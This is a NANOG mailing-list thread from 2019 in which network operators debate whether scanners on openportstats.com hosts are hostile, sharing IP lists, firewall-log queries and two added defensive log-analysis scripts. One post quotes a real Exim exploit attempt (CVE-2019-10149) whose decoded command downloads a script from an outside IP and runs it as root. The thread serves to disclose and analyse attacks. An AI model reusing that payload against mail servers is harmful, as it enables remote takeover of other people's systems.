https://twitter.com/GreyNoiseIO/status/1129017971135995904
https://twitter.com/JayTHL/status/1128718224965685248
Friday Questionnaire:
Is there anybody on this list who keeps firewall logs and who DOESN'T have numerous hits recorded therein from one or more of the following IP addresses?
80.82.64.21 scanner29.openportstats.com
80.82.70.2 scanner8.openportstats.com
80.82.70.198 scanner21.openportstats.com
80.82.70.216 scanner13.openportstats.com
80.82.78.104 scanner151.openportstats.com
89.248.160.132 scanner15.openportstats.com
89.248.162.168 scanner5.openportstats.com
89.248.168.62 scanner1.openportstats.com
89.248.168.63 scanner2.openportstats.com
89.248.168.73 scanner3.openportstats.com
89.248.168.74 scanner4.openportstats.com
89.248.168.170 scanner17.openportstats.com
89.248.168.196 scanner16.openportstats.com
89.248.171.38 scanner7.openportstats.com
89.248.171.57 scanner20.openportstats.com
89.248.172.18 scanner25.openportstats.com
89.248.172.23 scanner27.openportstats.com
93.174.91.31 scanner10.openportstats.com
93.174.91.34 scanner11.openportstats.com
93.174.91.35 scanner12.openportstats.com
93.174.93.98 scanner18.openportstats.com
93.174.93.149 scanner6.openportstats.com
93.174.93.241 scanner14.openportstats.com
93.174.95.37 scanner19.openportstats.com
93.174.95.42 scanner8.openportstats.com
94.102.51.31 scanner31.openportstats.com
94.102.51.98 scanner55.openportstats.com
94.102.52.245 scanner9.openportstats.com
NOTE: Dshield has already assigned an 8 rating on their Badness Richter Scale to the specific one of the above addresses that's been poking me personally in recent days:
https://www.dshield.org/ipinfo.html?ip=89.248.162.168
https://www.dshield.org/ipdetails.html?ip=89.248.162.168
And the Dshield rating is *just* based on the probing. The addition of malware slinging also puts this whole mess over the top entirely.
Oh! And I'll save you all the time looking it up.... 100% of the IPs listed above are on AS202425 "IP Volume, Inc." allegedly of the Seychelles Islands, where the employees and management are no doubt enjoying their luxurious and expansive new corporate headquarters...
https://bit.ly/2ZBayc4
Regards,
rfg
P.S. This is the kind of thing that everybody really should expect when the U.S. Department of Defense takes it upon itself to start up its own little private and unauthorized (cyber)war on Russia, without first obtaining the consent of Congress... you know, kinda like that ancient yellowed document that nobody in this country reads anymore says they should. And apparently, the DoD was understandably not anxious to brief even the President about all this...
https://www.businessinsider.com/us-officials-hide-russia-cyber-operation-tru...
(Not that anybody can really blame them for THAT.)
On Friday, 21 June, 2019 18:14, Ronald F. Guilmette <rfg@tristatelogic.com> wrote:
https://twitter.com/GreyNoiseIO/status/1129017971135995904 https://twitter.com/JayTHL/status/1128718224965685248
Sorry, don't twitter ... Too much malicious JavaScript there.
Friday Questionnaire:
Is there anybody on this list who keeps firewall logs and who DOESN'T have numerous hits recorded therein from one or more of the following IP addresses?
80.82.64.21 scanner29.openportstats.com
80.82.70.2 scanner8.openportstats.com
80.82.70.198 scanner21.openportstats.com
80.82.70.216 scanner13.openportstats.com
80.82.78.104 scanner151.openportstats.com
89.248.160.132 scanner15.openportstats.com
89.248.162.168 scanner5.openportstats.com
89.248.168.62 scanner1.openportstats.com
89.248.168.63 scanner2.openportstats.com
89.248.168.73 scanner3.openportstats.com
89.248.168.74 scanner4.openportstats.com
89.248.168.170 scanner17.openportstats.com
89.248.168.196 scanner16.openportstats.com
89.248.171.38 scanner7.openportstats.com
89.248.171.57 scanner20.openportstats.com
89.248.172.18 scanner25.openportstats.com
89.248.172.23 scanner27.openportstats.com
93.174.91.31 scanner10.openportstats.com
93.174.91.34 scanner11.openportstats.com
93.174.91.35 scanner12.openportstats.com
93.174.93.98 scanner18.openportstats.com
93.174.93.149 scanner6.openportstats.com
93.174.93.241 scanner14.openportstats.com
93.174.95.37 scanner19.openportstats.com
93.174.95.42 scanner8.openportstats.com
94.102.51.31 scanner31.openportstats.com
94.102.51.98 scanner55.openportstats.com
94.102.52.245 scanner9.openportstats.com
I have just a few. They have all been blocked. There have been no incoming sessions established, nor any outbound sessions to these addresses.
Why do you think it is a problem and not just run-of-the-mill background radiation on the Internet?
Do you (or your endpoints) not have a firewall to block such things?
sqlite> select * from hosts where name like '%openports%';
id      address        name                          description  asn     lastupdate
------  -------------  ----------------------------  -----------  ------  ----------
3662    93.174.93.241  scanner14.openportstats.com.               202425  1561209704
5061    93.174.95.42   scanner8.openportstats.com.                202425  1560718494
11894   93.174.93.149  scanner6.openportstats.com.                202425  1560732443
17720   93.174.93.98   scanner18.openportstats.com.               202425  1560640554
54208   80.82.70.2     scanner8.openportstats.com.                202425  1560774033
54790   89.248.160.13  scanner15.openportstats.com.               202425  1560682732
55081   89.248.168.19  scanner16.openportstats.com.               202425  1561158220
55629   89.248.168.17  scanner17.openportstats.com.               202425  1560817976
59858   89.248.171.57  scanner20.openportstats.com.               202425  1560800216
64626   89.248.171.38  scanner7.openportstats.com.                202425  1560841829
70081   93.174.95.37   scanner19.openportstats.com.               202425  1560802023
72978   80.82.70.216   scanner13.openportstats.com.               202425  1560709312
74711   94.102.52.245  scanner9.openportstats.com.                202425  1560589038
80358   89.248.162.16  scanner5.openportstats.com.                202425  1561217966
86148   89.248.172.18  scanner25.openportstats.com.               202425  1560884061
89484   94.102.51.31   scanner31.openportstats.com.               202425  1561199715
90131   80.82.70.198   scanner21.openportstats.com.               202425  1560776777
90531   80.82.78.104   scanner151.openportstats.com               202425  1561150052
91641   80.82.64.21    scanner29.openportstats.com.               202425  1561184548
104810  94.102.51.98   scanner55.openportstats.com.               202425  1561138118
sqlite> select * from asns where asn=202425;
asn     country  rir      allocated   description      lastupdate
------  -------  -------  ----------  ---------------  ----------
202425  SC       ripencc  2018-05-17  INT-NETWORK, SC  1561217966
sqlite> select srcaddress, count(*), min(localtime), max(localtime) from firewalllog where srcaddress in (select address from hosts where name like '%openportstats.com.') group by srcaddress;
srcaddress   count(*)  min(localtime)                  max(localtime)
-----------  --------  ------------------------------  ------------------------------
80.82.64.21  6         2019-03-28 05:21:13.919 -06:00  2019-03-31 06:47:28.309 -06:00
80.82.70.2   208       2019-01-23 12:58:02.557 -07:00  2019-04-02 06:37:43.125 -06:00
80.82.70.19  114       2019-03-25 14:13:17.058 -06:00  2019-04-02 06:39:57.214 -06:00
80.82.70.21  17970     2019-02-25 13:34:52.202 -07:00  2019-04-24 19:27:58.113 -06:00
80.82.78.10  767       2019-03-26 08:37:53.799 -06:00  2019-06-21 15:27:05.791 -06:00
89.248.160.  1754      2019-01-24 12:40:58.764 -07:00  2019-04-13 05:02:00.866 -06:00
89.248.162.  1384      2019-03-09 16:21:40.538 -07:00  2019-06-22 09:39:26.809 -06:00
89.248.168.  43        2019-01-25 18:52:41.512 -07:00  2019-03-28 06:57:15.269 -06:00
89.248.168.  1543      2019-01-24 23:03:14.052 -07:00  2019-04-23 01:46:26.558 -06:00
89.248.171.  22        2019-02-10 12:14:00.168 -07:00  2019-02-12 14:16:40.212 -07:00
89.248.171.  1850      2019-02-01 18:06:15.893 -07:00  2019-06-17 13:36:56.062 -06:00
89.248.172.  3         2019-03-18 20:33:50.209 -06:00  2019-03-23 16:47:31.949 -06:00
93.174.93.9  67        2018-12-08 17:42:28.122 -07:00  2019-04-01 03:24:06.896 -06:00
93.174.93.1  16        2018-12-04 03:34:47.534 -07:00  2019-05-07 01:34:27.308 -06:00
93.174.93.2  1661      2018-11-23 10:13:06.957 -07:00  2019-06-22 07:21:44.239 -06:00
93.174.95.3  144       2019-02-20 08:06:52.282 -07:00  2019-02-28 02:30:39.109 -07:00
93.174.95.4  252       2018-11-24 22:14:19.061 -07:00  2019-03-03 19:04:48.709 -07:00
94.102.51.3  262       2019-03-24 10:03:55.679 -06:00  2019-06-22 04:35:15.886 -06:00
94.102.51.9  32        2019-04-28 08:52:43.818 -06:00  2019-05-17 11:22:16.166 -06:00
94.102.52.2  38        2019-02-28 12:45:52.949 -07:00  2019-03-07 07:30:03.547 -07:00
NOTE: Dshield has already assigned an 8 rating on their Badness Richter Scale to the specific one of the above addresses that's been poking me personally in recent days:
https://www.dshield.org/ipinfo.html?ip=89.248.162.168 https://www.dshield.org/ipdetails.html?ip=89.248.162.168
And the Dshield rating is *just* based on the probing. The addition of malware slinging also puts this whole mess over the top entirely.
What malware slinging? I see none of that. Merely unsolicited incoming connection attempts. I note that neither the ASN in question nor the addresses are on the DROP list.
Oh! And I'll save you all the time looking it up.... 100% of the IPs listed above are on AS202425 "IP Volume, Inc. allegedly of the Seychelles Islands, where the employees and management are no doubt enjoying their luxurious and expansive new corporate headquarters...
Good for them. Everyone should have luxurious and expansive corporate headquarters.
Malicious link detected. -- The fact that there's a Highway to Hell but only a Stairway to Heaven says a lot about anticipated traffic volume.
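The per-source count/min/max query in the message above is a handy triage pattern: a table of reverse names and ASNs is joined to the raw firewall log, so one operator's whole address pool shows up together instead of as 28 unrelated sources. The following is an added example, not Keith's database or code. It builds the same three tables in an in-memory SQLite database from constructed iptables-style LOG lines (addresses from the RFC 5737 documentation ranges, ASNs from the RFC 5398 documentation range, invented reverse names), runs the same grouped query, and adds a per-ASN roll-up; one ICMP line without a DPT field is included to show the parser tolerating it.

```python
import re
import sqlite3

# Constructed iptables LOG lines (not from the thread); documentation addresses only.
SAMPLE_LOG = """\
2019-06-20T10:01:02-06:00 gw kernel: DROP IN=eth0 SRC=198.51.100.7 DST=192.0.2.10 PROTO=TCP DPT=22
2019-06-20T10:05:44-06:00 gw kernel: DROP IN=eth0 SRC=198.51.100.7 DST=192.0.2.10 PROTO=TCP DPT=445
2019-06-21T03:17:09-06:00 gw kernel: DROP IN=eth0 SRC=198.51.100.9 DST=192.0.2.10 PROTO=TCP DPT=8080
2019-06-22T08:30:00-06:00 gw kernel: DROP IN=eth0 SRC=203.0.113.5 DST=192.0.2.10 PROTO=ICMP
2019-06-22T09:12:51-06:00 gw kernel: DROP IN=eth0 SRC=198.51.100.7 DST=192.0.2.10 PROTO=TCP DPT=23
"""

# Constructed inventory rows with the same column layout as the thread's tables.
HOSTS = [
    (1, "198.51.100.7", "scanner1.example-scanner.test.", "", 64496, 1561209704),
    (2, "198.51.100.9", "scanner2.example-scanner.test.", "", 64496, 1561209704),
    (3, "203.0.113.5", "resolver.example.net.", "", 64497, 1561209704),
]
ASNS = [
    (64496, "ZZ", "example-rir", "2018-05-17", "EXAMPLE-SCANNER", 1561217966),
    (64497, "ZZ", "example-rir", "2010-01-01", "EXAMPLE-ISP", 1561217966),
]

# Timestamp, source, protocol, and an optional destination port (absent for ICMP).
LINE_RE = re.compile(
    r"^(?P<ts>\S+) \S+ kernel: .*?SRC=(?P<src>[\d.]+) .*?PROTO=(?P<proto>\w+)"
    r"(?: .*?DPT=(?P<dpt>\d+))?"
)


def build_db(log_text=SAMPLE_LOG):
    """Create hosts/asns/firewalllog tables and load the parsed LOG lines."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE hosts(id INTEGER PRIMARY KEY, address TEXT, name TEXT,
                           description TEXT, asn INTEGER, lastupdate INTEGER);
        CREATE TABLE asns(asn INTEGER PRIMARY KEY, country TEXT, rir TEXT,
                          allocated TEXT, description TEXT, lastupdate INTEGER);
        CREATE TABLE firewalllog(srcaddress TEXT, proto TEXT, dport INTEGER, localtime TEXT);
    """)
    conn.executemany("INSERT INTO hosts VALUES (?,?,?,?,?,?)", HOSTS)
    conn.executemany("INSERT INTO asns VALUES (?,?,?,?,?,?)", ASNS)
    rows = []
    for line in log_text.splitlines():
        m = LINE_RE.search(line)
        if m:
            dport = int(m["dpt"]) if m["dpt"] else None
            rows.append((m["src"], m["proto"], dport, m["ts"]))
    conn.executemany("INSERT INTO firewalllog VALUES (?,?,?,?)", rows)
    return conn


def hits_by_name_pattern(conn, pattern):
    """Same shape as the thread's query: hit count and first/last time per source
    whose reverse name matches the LIKE pattern (ISO timestamps sort as text)."""
    return conn.execute("""
        SELECT srcaddress, COUNT(*), MIN(localtime), MAX(localtime)
        FROM firewalllog
        WHERE srcaddress IN (SELECT address FROM hosts WHERE name LIKE ?)
        GROUP BY srcaddress ORDER BY srcaddress
    """, (pattern,)).fetchall()


def hits_by_asn(conn):
    """Roll the same hits up by ASN so a whole operator pool is visible at once."""
    return conn.execute("""
        SELECT a.asn, a.description, COUNT(*) AS hits, COUNT(DISTINCT f.srcaddress) AS sources
        FROM firewalllog f
        JOIN hosts h ON h.address = f.srcaddress
        JOIN asns a ON a.asn = h.asn
        GROUP BY a.asn ORDER BY hits DESC
    """).fetchall()


if __name__ == "__main__":
    db = build_db()
    for row in hits_by_name_pattern(db, "%example-scanner.test."):
        print(row)
    for row in hits_by_asn(db):
        print(row)
```

The reverse names and ASN descriptions in `HOSTS` and `ASNS` would normally be filled by a periodic PTR/whois lookup job; keeping them in their own tables (as the thread's schema does) is what lets a single LIKE pattern or ASN pull every related source out of the log.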
AS202425 = AS29073. Formerly known as Quasi Networks / Ecatel. See previous NANOG thread here: https://mailman.nanog.org/pipermail/nanog/2017-August/091956.html On Sat, Jun 22, 2019 at 10:03 AM Keith Medcalf <kmedcalf@dessus.com> wrote:
Hello, On Sat, Jun 22, 2019 at 11:01:13AM -0600, Keith Medcalf wrote:
What malware slinging?
Some user there is trying to exploit CVE-2018-10149:
2019-06-11 11:28:35 SMTP protocol synchronization error (next input sent too soon: pipelining was not advertised): rejected "RCPT TO:<bin+${run{\x2fbin\x2fsh\x20\x2dc\x20\x22wget\x20\x2d\x2dno\x2dcheck\x2dcertificate\x20\x2dT\x2036\x20https\x3a\x2f\x2f185\x2e162\x2e235\x2e211\x2fldm1ip\x20\x2dO\x20\x2froot\x2f\x2eyyearz\x20\x26\x26\x20sh\x20\x2froot\x2f\x2eyyearz\x20\x2dn\x20\x26\x22}}@myhostname>" H=(myhostname) [89.248.171.57] next input="QUIT\n"
Plus another 17 attempts by that IP through to 19 June.
$ printf "\x2fbin\x2fsh\x20\x2dc\x20\x22wget\x20\x2d\x2dno\x2dcheck\x2dcertificate\x20\x2dT\x2036\x20https\x3a\x2f\x2f185\x2e162\x2e235\x2e211\x2fldm1ip\x20\x2dO\x20\x2froot\x2f\x2eyyearz\x20\x26\x26\x20sh\x20\x2froot\x2f\x2eyyearz\x20\x2dn\x20\x26\x22\n"
/bin/sh -c "wget --no-check-certificate -T 36 hxxps://185.162.235.211/ldm1ip -O /root/.yyearz && sh /root/.yyearz -n &"
(I replaced https with hxxps to prevent auto-link-followers from hitting the site.)
Cheers,
Andy
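The `printf` step in the message above is the manual way to turn Exim's `\xNN` string escapes back into the command hidden in the `${run{...}}` expansion. The following is an added example, not Andy's code, that automates that for an analyst: it scans constructed Exim mainlog lines (an RFC 5737 address, a constructed message ID, and a harmless `echo` placeholder where the real payload would be) and flags any envelope address that carries a `${` expansion, decodes the escapes, and counts attempts per peer address so that repeated probes from one source stand out.

```python
import re
from collections import Counter

# Constructed Exim mainlog lines (not from the thread). The two sync-error lines mimic
# the shape of the rejection quoted above, with a documentation address and a
# placeholder command; the other two are ordinary traffic that must not be flagged.
SAMPLE_MAINLOG = [
    r'2019-06-11 11:28:35 SMTP protocol synchronization error (next input sent too soon: '
    r'pipelining was not advertised): rejected "RCPT TO:<bin+${run{\x2fbin\x2fsh\x20\x2dc'
    r'\x20\x22echo\x20CONSTRUCTED\x22}}@myhostname>" H=(myhostname) [203.0.113.10] next input="QUIT\n"',
    r'2019-06-11 11:30:00 H=mail.example.org [203.0.113.20] F=<alice@example.org> '
    r'rejected RCPT <nobody@myhostname>: Unrouteable address',
    r'2019-06-11 11:31:12 1hYx1a-0001Tv-2C <= bob@example.net H=(example) [203.0.113.30] P=esmtp S=1234',
    r'2019-06-12 08:02:41 SMTP protocol synchronization error (next input sent too soon: '
    r'pipelining was not advertised): rejected "RCPT TO:<bin+${run{\x2fbin\x2fsh\x20\x2dc'
    r'\x20\x22echo\x20AGAIN\x22}}@myhostname>" H=(myhostname) [203.0.113.10] next input="QUIT\n"',
]

HEX_ESC = re.compile(r'\\x([0-9a-fA-F]{2})')          # Exim's \xNN escape
EXPANSION_ADDR = re.compile(r'<([^>]*\$\{[^>]*)>')     # any <address> containing ${
PEER_IP = re.compile(r'\[([0-9a-fA-F.:]+)\]')          # first [ip] on the line


def decode_exim_escapes(text):
    r"""Turn \xNN escapes back into characters; everything else is left untouched."""
    return HEX_ESC.sub(lambda m: chr(int(m.group(1), 16)), text)


def find_expansion_attempts(lines):
    """One record per log line whose envelope address carries a ${...} expansion."""
    hits = []
    for line in lines:
        m = EXPANSION_ADDR.search(line)
        if not m:
            continue
        ip = PEER_IP.search(line)
        hits.append({
            "time": line[:19],
            "ip": ip.group(1) if ip else None,
            "raw": m.group(1),
            "decoded": decode_exim_escapes(m.group(1)),
            "uses_run": "${run{" in m.group(1),
        })
    return hits


def attempts_per_ip(hits):
    """Count flagged lines per peer address."""
    return Counter(h["ip"] for h in hits)


if __name__ == "__main__":
    found = find_expansion_attempts(SAMPLE_MAINLOG)
    for h in found:
        print(h["time"], h["ip"], "run" if h["uses_run"] else "expansion", h["decoded"])
    print(dict(attempts_per_ip(found)))
```

A legitimate local part never contains `${`, so the presence of an expansion in an envelope address is itself the signal; decoding is only there so the analyst can read what was attempted without the `printf` step.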
In message <f2682032aa620f49aa50b30579a9357f@mail.dessus.com>, "Keith Medcalf" <kmedcalf@dessus.com> wrote:
On Friday, 21 June, 2019 18:14, Ronald F. Guilmette <rfg@tristatelogic.com> wrote:
https://twitter.com/GreyNoiseIO/status/1129017971135995904 https://twitter.com/JayTHL/status/1128718224965685248
Sorry, don't twitter ... Too much malicious JavaScript there.
Can you be more, um, specific?
80.82.64.21 scanner29.openportstats.com ...
Why do you think it is a problem and not just run-of-the-mill background radiation on the Internet?
It's not a problem for me personally... other than the fact that these goofballs are filling up my log files to no good end. I just wanted others to be aware of this (apparently ongoing) garbage. And I wouldn't want anyone to be fooled by the mere fact that this openportstats.com domain has a sort-of a web site. It's still 100% illegitimate.
Do you (or your endpoints) not have a firewall to block such things?
I do, and I hope everyone else does also.
What malware slinging? I see none of that.
You didn't look at the Twitter reports.
Malicious link detected.
If you say so. (It's actually just a cute picture.) Regards, rfg
On 6/22/19 2:13 AM, Ronald F. Guilmette wrote:
https://twitter.com/GreyNoiseIO/status/1129017971135995904 https://twitter.com/JayTHL/status/1128718224965685248
Friday Questionnaire:
Is there anybody on this list who keeps firewall logs and who DOESN'T have numerous hits recorded therein from one or more of the following IP addresses?
80.82.64.21 scanner29.openportstats.com
80.82.70.2 scanner8.openportstats.com
80.82.70.198 scanner21.openportstats.com
80.82.70.216 scanner13.openportstats.com
80.82.78.104 scanner151.openportstats.com
89.248.160.132 scanner15.openportstats.com
89.248.162.168 scanner5.openportstats.com
89.248.168.62 scanner1.openportstats.com
89.248.168.63 scanner2.openportstats.com
89.248.168.73 scanner3.openportstats.com
89.248.168.74 scanner4.openportstats.com
89.248.168.170 scanner17.openportstats.com
89.248.168.196 scanner16.openportstats.com
89.248.171.38 scanner7.openportstats.com
89.248.171.57 scanner20.openportstats.com
89.248.172.18 scanner25.openportstats.com
89.248.172.23 scanner27.openportstats.com
93.174.91.31 scanner10.openportstats.com
93.174.91.34 scanner11.openportstats.com
93.174.91.35 scanner12.openportstats.com
93.174.93.98 scanner18.openportstats.com
93.174.93.149 scanner6.openportstats.com
93.174.93.241 scanner14.openportstats.com
93.174.95.37 scanner19.openportstats.com
93.174.95.42 scanner8.openportstats.com
94.102.51.31 scanner31.openportstats.com
94.102.51.98 scanner55.openportstats.com
94.102.52.245 scanner9.openportstats.com
NOTE: Dshield has already assigned an 8 rating on their Badness Richter Scale to the specific one of the above addresses that's been poking me personally in recent days:
https://www.dshield.org/ipinfo.html?ip=89.248.162.168 https://www.dshield.org/ipdetails.html?ip=89.248.162.168
And the Dshield rating is *just* based on the probing. The addition of malware slinging also puts this whole mess over the top entirely.
Oh! And I'll save you all the time looking it up.... 100% of the IPs listed above are on AS202425 "IP Volume, Inc. allegedly of the Seychelles Islands, where the employees and management are no doubt enjoying their luxurious and expansive new corporate headquarters...
It's just a port/vulnerability scanner, I really don't see anything special about this particular case. "IP Volume" is actually a new brand of Ecatel/Quasi Networks, servers are in a Dutch datacenter.
P.S. This is the kind of thing that everybody really should expect when the U.S. Department of Defense takes it upon itself to start up its own little private and unauthorized (cyber)war on Russia, without first obtaining the consent of Congress... you know, kinda like that ancient yellowed document that nobody in this country reads anymore says they should. And apparently, the DoD was understandably not anxious to brief even the President about all this...
https://www.businessinsider.com/us-officials-hide-russia-cyber-operation-tru...
(Not that anybody can really blame them for THAT.) What does that have to do with the vulnerability scanner? Also: You know it doesn't make any sense, right?
-- Filip Hruska Linux System Administrator
On Sat, 22 Jun 2019, Filip Hruska wrote:
It's just a port/vulnerability scanner, I really don't see anything special about this particular case.
they are pushing exploits. trying to RCE, wget a binary, chmod 777 on routers and rm -rf files. this goes way beyond scanner and into criminal trespass and destruction of property. https://twitter.com/JayTHL/status/1128700101675954176 remain ignorant if you want. -Dan
It's just a port/vulnerability scanner, I really don't see anything special about this particular case.
they are pushing exploits. trying to RCE, wget a binary, chmod 777 on routers and rm -rf files.
this goes way beyond scanner and into criminal trespass and destruction of property.
having trouble following the attribution. yes, of course there are folk trying to exploit. but missing the link that *these* folk are.
e.g. i am aware of researchers scanning to see patching spread and trying to make a conext paper dreadline this week or infocom next month.
hard to tell the sheep from the goats and the wolf from the sheep. i get the appended. sheep or wolf? i sure do not claim to be smart enough to know. but i sure am glad others are </snark>.
randy
---
Jun 20 18:53:23 winnti-scanner-victims-will-be-notified.threatsinkhole.com �V�Dz/�
Jun 20 18:53:23 ran rsyslogd: imtcp imtcp: Framing Error in received TCP message from peer: (hostname) winnti-scanner-victims-will-be-notified.threatsinkhole.com, (ip) winnti-scanner-victims-will-be-notified.threatsinkhole.com: delimiter is not SP but has ASCII value -51. [v8.32.0]
Jun 20 18:53:55 winnti-scanner-victims-will-be-notified.threatsinkhole.com �t�C� #000F#000#000#000#000#000����#000#000#000#000#001#004F#000#000#000#003#010�=)�#027�$��#000#000#000#000#000++#000#000#000#000(#000#000#000#000#000#000#000#000#000#000#000#000#000#000#000#001#001#000#000#000#000#026#000#000#000#000#000#000#000#000#000#000#000#000#000#000#000#000#000#000#000#004#000#000#000#000#000#000#000#000#000#004#000#000#000#000
On Sun, 23 Jun 2019, Randy Bush wrote:
It's just a port/vulnerability scanner, I really don't see anything special about this particular case. they are pushing exploits. trying to RCE, wget a binary, chmod 777 on routers and rm -rf files.
this goes way beyond scanner and into criminal trespass and destruction of property.
https://twitter.com/JayTHL/status/1128700101675954176 having trouble following the attribution. yes, of course there are folk trying to exploit. but missing the link that *these* folk are.
https://pbs.twimg.com/media/D6oBGYPUwAECG09.png
you're trying to defend them?
-Dan
On 24/06/2019 00:23, Randy Bush wrote:
e.g. i am aware of researchers scanning to see patching spread and trying to make a conext paper dreadline this week or infocom next month.
hard to tell the sheep from the goats and the wolf from the sheep. i get the appended. sheep or wolf? i sure do not claim to be smart enough to know. but i sure am glad others are </snark>.
Greynoise can be your friend:
https://greynoise.io/about
https://viz.greynoise.io/table
-Hank
randy
---
I chuckle the most at the original twitter post from Greynoise : "We have revoked the benign tag for OpenPortStats[.]com" Did anyone actually think such a thing would be legitimate to start with? :) On Mon, Jun 24, 2019 at 12:26 AM Hank Nussbacher <hank@efes.iucc.ac.il> wrote:
On Fri, Jun 21, 2019 at 05:13:35PM -0700, Ronald F. Guilmette wrote:
Is there anybody on this list who keeps firewall logs and who DOESN'T have numerous hits recorded therein from one or more of the following IP addresses?
Well, I *did*, but having noticed their activities and grown tired of them, I now just drop their traffic on the floor (and log it). They are one of several operations that I've noticed who have taken it upon themselves to poke at open (and closed) ports without bothering to ask.
Assuming for a moment the most charitable interpretation of their collective actions -- that they are earnestly researching problems with the intention of helping to solve them -- this is still highly problematic for two reasons:
1. They didn't ask permission.
2. Whether they realize it or not, they're building a target. When, not if, their results database(s) are compromised, they will have furnished the attackers with a comprehensive target list, painstakingly gathered at no cost to them and thoughtfully annotated with whatever metadata has been collected.
---rsk
See inline responses... ‐‐‐‐‐‐‐ Original Message ‐‐‐‐‐‐‐ On Friday, June 21, 2019 6:13 PM, Ronald F. Guilmette <rfg@tristatelogic.com> wrote:
https://twitter.com/GreyNoiseIO/status/1129017971135995904 https://twitter.com/JayTHL/status/1128718224965685248
After forwarding these links to a sanitized client on another network, I saw nothing on the "twitter reports" which suggests these subnets are doing anything other than port scanning. For those who refuse to follow Twitter links (I'm with ya): There is one cropped screen shot of a pcap with some incomplete information for an entirely different subnet and zero useful intel.
Am I missing something, or do you have any actual log files to support your claims of malware slinging from these guys? ....and I do not want "popularity contest" results of the twitter-verse - to protect our networks. Real data is needed. We need to know what we are looking for specifically.
As for the network probing - this is why those activities are blocked and other techniques are implemented to obscure the usefulness of the data they collect.
The way I see it... If people go poking their hands in the honey jars without permission, they may just get something they do not want or expect (I hear non-consensual probing can infect the violator with certain diseases, and that would be a shame)
Friday Questionnaire:
Is there anybody on this list who keeps firewall logs and who DOESN'T have numerous hits recorded therein from one or more of the following IP addresses?
[snip]
NOTE: Dshield has already assigned an 8 rating on their Badness Richter Scale to the specific one of the above addresses that's been poking me personally in recent days:
https://www.dshield.org/ipinfo.html?ip=89.248.162.168 https://www.dshield.org/ipdetails.html?ip=89.248.162.168
And the Dshield rating is just based on the probing. The addition of malware slinging also puts this whole mess over the top entirely.
What malware?
Oh! And I'll save you all the time looking it up.... 100% of the IPs listed above are on AS202425 "IP Volume, Inc. allegedly of the Seychelles Islands, where the employees and management are no doubt enjoying their luxurious and expansive new corporate headquarters...
Sounds like a good deal.
I do not follow external links generally, as a rule, without compelling need and additional measures taken.
Regards, rfg
P.S. This is the kind of thing that everybody really should expect when the U.S. Department of Defense takes it upon itself to start up its own little private and unauthorized (cyber)war on Russia, without first obtaining the consent of Congress... you know, kinda like that ancient yellowed document that nobody in this country reads anymore says they should. And apparently, the DoD was understandably not anxious to brief even the President about all this...
https://www.businessinsider.com/us-officials-hide-russia-cyber-operation-tru...
(Not that anybody can really blame them for THAT.)
P.S. Let's try to keep politics off the list. We get enough of that everywhere else.
Thanks,
Brad
Hi Brad, On Sun, Jun 23, 2019 at 09:43:00PM +0000, Brad via NANOG wrote:
On Friday, June 21, 2019 6:13 PM, Ronald F. Guilmette <rfg@tristatelogic.com> wrote:
https://twitter.com/GreyNoiseIO/status/1129017971135995904 https://twitter.com/JayTHL/status/1128718224965685248
After forwarding these links to a sanitized client on another network, I saw nothing on the "twitter reports" which suggest these subnets are doing anything other than port scanning.
Earlier I posted one example of an attempt to exploit CVE-2019-10149 to execute commands as root on one of my machines. I have 17 other examples from the same IP that try to do similar things via the same exploit, though there are differences which suggest to me that multiple users or groups are using openportstats for this purpose. Would you like to see them? I think that trying to actively exploit a bug to execute arbitrary commands is a lot different to mere port scanning. They aren't all harmless commands either; some of them install rootkits and remote shells. Cheers, Andy
participants (11)
- Andy Smith
- Brad
- Dan Hollis
- Filip Hruska
- Hank Nussbacher
- Keith Medcalf
- Randy Bush
- Rich Kulawiec
- Ronald F. Guilmette
- Tom Beecher
- Troy Mursch